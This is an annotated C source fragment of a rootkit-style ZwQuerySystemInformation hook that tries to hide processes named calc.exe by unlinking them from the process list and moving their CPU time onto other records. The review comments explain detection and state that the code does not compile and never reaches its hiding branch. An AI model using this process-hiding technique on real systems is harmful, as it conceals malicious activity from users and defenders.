/*
 * Per-thread record that follows each _SYSTEM_PROCESSES record in the
 * class-5 result buffer (see Threads[] in _SYSTEM_PROCESSES below).
 * The field names mirror the NT system-information layout; nothing on this
 * page reads any of these fields, the struct only contributes its size to
 * sizeof(struct _SYSTEM_PROCESSES).
 */
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;              // presumably a typo of ClientId; harmless here since the field is never referenced
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};
/*
 * One record of the variable-length process list returned for information
 * class 5 (SystemProcessInformation). Records are chained by NextEntryDelta,
 * the byte offset from the start of this record to the next one; 0 marks
 * the last record (NewZwQuerySystemInformation below treats 0 as end of list).
 * The hook reads ProcessName, UserTime and KernelTime and rewrites
 * NextEntryDelta to unlink a record from the chain.
 */
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;            // byte offset to the next record, 0 on the last one
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;      // Buffer is compared against L"calc.exe" by the hook; may be NULL
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters; //windows 2000 only
// Trailing thread array; presumably ThreadCount entries follow, so a real
// record is usually larger than sizeof(struct _SYSTEM_PROCESSES) -- verify
// against the NT layout before relying on the struct size.
struct _SYSTEM_THREADS Threads[1];
};
/*
 * Layout used for information class 8 (SystemProcessorPerformanceInformation).
 * The hook only touches IdleTime, and only on the first struct in the buffer.
 * NOTE(review): this class presumably returns one record per processor;
 * the code on this page never indexes past the first one -- confirm.
 */
struct _SYSTEM_PROCESSOR_TIMES
{
LARGE_INTEGER IdleTime;
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER DpcTime;
LARGE_INTEGER InterruptTime;
ULONG InterruptCount;
};
/*
 * Prototype of the native ZwQuerySystemInformation entry point (C linkage --
 * this file is compiled as C++), a matching function-pointer type, and the
 * file-scope state shared with NewZwQuerySystemInformation below.
 */
extern "C" NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
// Same signature as a pointer type, so the original entry can be called
// through the saved global below.
typedef NTSTATUS (*ZwQuerySystemInformationPtr)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
// Original entry point, to be saved by the code that installs the hook;
// that code is not on this page, so this is NULL until set elsewhere.
ZwQuerySystemInformationPtr ZwQuerySystemInformationOld;
// CPU time taken from hidden process records, carried across calls until it
// is credited to another record (class 5) or to IdleTime (class 8).
// NOTE(review): updated with no synchronization; concurrent callers of the
// hook would race on these.
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;
/*
 * Replacement for ZwQuerySystemInformation, installed by hooking code that
 * is not on this page. It forwards the call to the saved original entry and,
 * on success, rewrites two result classes in place in the caller's buffer:
 *   class 5: walks the process list and tries to unlink every record whose
 *            ProcessName matches L"calc.exe" (process hiding), banking the
 *            hidden record's user/kernel CPU time in m_UserTime/m_KernelTime
 *            and crediting it to the next record that is not hidden;
 *   class 8: adds whatever time is still banked to the processor's IdleTime,
 *            so the totals keep adding up.
 * This is the classic result-filtering pattern for hiding a process from
 * enumeration. A defender can spot it by cross-checking this API's output
 * against another enumeration source and by verifying that the dispatch
 * entry for ZwQuerySystemInformation still points at its original address.
 *
 * Parameters and return value are those of ZwQuerySystemInformation; the
 * status of the forwarded call is returned unchanged.
 * NOTE(review): several lines in the class-5 walk do not do what their shape
 * suggests; each is noted inline rather than changed here.
 */
NTSTATUS NewZwQuerySystemInformation(IN ULONG SystemInformationClass,IN PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
// Forward to the original first; the cast is redundant, the global already has this type.
ntStatus = ((ZwQuerySystemInformationPtr)(ZwQuerySystemInformationOld))(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
if(NT_SUCCESS(ntStatus))
{
// Class 5: SystemProcessInformation, the process list (the original comment
// here, "File and Directory Listing", did not describe this branch).
if(SystemInformationClass==5)
{
struct _SYSTEM_PROCESSES *cPRS = (struct _SYSTEM_PROCESSES *)SystemInformation;   // current record
struct _SYSTEM_PROCESSES *pPRS = NULL;                                              // previous record, NULL at the head
while (cPRS)
{
if(cPRS->ProcessName.Buffer != NULL)
{
// As written the third argument is the expression `12 == 0`, so memcmp is
// asked to compare 0 bytes and always returns 0; the condition is then false
// and the hide branch below is never entered.
if(memcmp(cPRS->ProcessName.Buffer,L"calc.exe",12 == 0))
{
// Bank this record's CPU time so the totals can be re-credited elsewhere.
m_UserTime.QuadPart += cPRS->UserTime.QuadPart;
m_KernelTime.QuadPart += cPRS->KernelTime.QuadPart;
if(pPRS)
{
// Unlink: make the previous record's delta skip over this one, or
// make the previous record the last one if this one was last.
if(cPRS->NextEntryDelta)
{
pPRS->NextEntryDelta += cPRS->NextEntryDelta;
}
else
{
pPRS->NextEntryDelta = 0;
}
}
else
{
// Head of the list: only the local parameter copy is advanced, so the
// caller's buffer pointer is unaffected and a matching first record stays
// visible. This line also has an unmatched ')' and does not compile as written.
if(cPRS->NextEntryDelta)
{
SystemInformation = (char *)SystemInformation + cPRS->NextEntryDelta);
}
else
SystemInformation = NULL;
}
}
}
else
{
// Not hidden: this record absorbs the banked time, then the bank is cleared.
cPRS->UserTime.QuadPart += m_UserTime.QuadPart;
cPRS->KernelTime.QuadPart += m_KernelTime.QuadPart;
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
}
// pPRS is set even for a record that was just unlinked, so a second hidden
// record in a row would edit the delta of the unlinked one, not of the last
// surviving record.
pPRS = cPRS;
// NextEntryDelta is a byte offset, but this is pointer arithmetic on a struct
// pointer: it advances by NextEntryDelta * sizeof(struct _SYSTEM_PROCESSES),
// unlike the byte-wise (char *) arithmetic used above.
if(cPRS->NextEntryDelta)(cPRS += cPRS->NextEntryDelta);
else cPRS = NULL;
}
}
// Class 8: SystemProcessorPerformanceInformation. Whatever time is still
// banked is attributed to idle time on the first processor record.
else if(SystemInformationClass == 8)
{
struct _SYSTEM_PROCESSOR_TIMES *times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
}
}
return ntStatus;
}